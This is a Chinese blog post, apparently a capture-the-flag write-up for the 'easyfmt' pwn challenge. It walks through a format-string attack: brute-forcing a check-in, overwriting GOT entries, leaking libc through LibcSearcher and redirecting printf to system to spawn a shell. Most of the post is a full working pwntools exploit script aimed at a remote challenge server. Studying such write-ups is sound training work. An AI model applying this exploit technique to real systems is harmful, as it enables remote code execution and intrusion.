Loading... <!-- wp:paragraph --> <p>easy是easy,但是特别麻烦。</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>简单的四步。</p> <!-- /wp:paragraph --> <!-- wp:image {"align":"center","id":870,"sizeSlug":"large","linkDestination":"none"} --> <div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/12/屏幕截图-2020-12-29-113841.png" alt="" class="wp-image-870"style=""></figure></div> <!-- /wp:image --> <!-- wp:paragraph --> <p>checkin没什么好办法,老老实实爆破,概率0.2,'0'-'4'都有可能</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>修改exit的got表值为</p> <!-- /wp:paragraph --> <!-- wp:image {"align":"center","id":871,"sizeSlug":"large","linkDestination":"none"} --> <div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/12/屏幕截图-2020-12-29-114022.png" alt="" class="wp-image-871"style=""></figure></div> <!-- /wp:image --> <!-- wp:paragraph --> <p>光标所指的这一行的地址,由于延迟绑定,原got表值为exit的plt表的偏移处,所以我们修改低二字节就可以了</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>leak出某个函数的got表值,用libcsearcher找出机器的libc版本</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>覆写printf@got为system的地址,输入'/bin/sh\x00',getshell</p> <!-- /wp:paragraph --> <!-- wp:code --> <pre class="wp-block-code"><code>#!/usr/bin/env python # coding=utf-8 from pwn import * from LibcSearcher import * context(log_level = 'debug') elf = ELF("./easyfmt") sh = remote('220.249.52.134','31322') sh.sendlineafter("enter:",'0') #payload = p64(elf.got["exit"]) + '%' + str(0x0982 - 8) + 'c' + '%8$hn' payload = '%' + str(0x0982) + 'c' + '%10$hn' payload = payload.ljust(16,'f') payload += p64(elf.got['exit']) sh.sendafter("slogan: ",payload) payload = 'start-%11$s-endf' #length 16 payload += p64(elf.got['read']) sh.sendafter("slogan: ",payload) sh.recvuntil('start-') #read_addr = int(sh.recvuntil('-end',drop = True),base = 16) read_addr = u64(sh.recvuntil('-end',drop = True).ljust(8,'\x00')) payload = '' libc = LibcSearcher('read',read_addr) system_addr = read_addr - libc.dump('read') + libc.dump('system') print hex(system_addr) if(((system_addr & 0x00000000ffff0000)>>16) > (system_addr & 0x000000000000ffff)): payload = '%' + str((system_addr & 0x000000000000ffff)) + 'c' + '%14$hn' payload += '%' + str(((system_addr & 0x00000000ffff0000)>>16) - (system_addr & 0x000000000000ffff)) + 'c' + '%15$hn' payload = payload.ljust(32,'f') payload += p64(elf.got['printf']) + p64(elf.got['printf'] + 2) else: payload = '%' + str((system_addr & 0x00000000ffff0000)>>16) + 'c' + '%15$hn' payload += '%' + str((system_addr & 0x000000000000ffff) - ((system_addr & 0x00000000ffff0000)>>16)) + 'c' + '%14$hn' payload = payload.ljust(32,'f') payload += p64(elf.got['printf']) + p64(elf.got['printf'] + 2) sh.sendafter("slogan: ",payload) sh.sendafter("slogan: ",'/bin/sh\x00') sh.interactive() </code></pre> <!-- /wp:code --> <!-- wp:paragraph --> <p>要注意的是每一次重新printf格式化字符串的时候,都进行了一次call操作,所以rsp会每次增加8,所以参数要每次加一。</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>这道题目也算是复习一下格式化字符串(几天不做就不会了),对于没有开启full reload的题,其实基本上就是leak libc->覆写got->ret2libc,堆利用和格式化字符串就是这么个套路</p> <!-- /wp:paragraph --> 最后修改:2020 年 12 月 30 日 © 允许规范转载 打赏 赞赏作者 支付宝微信 赞 0 如果觉得我的文章对你有用,那听听上面我喜欢的歌吧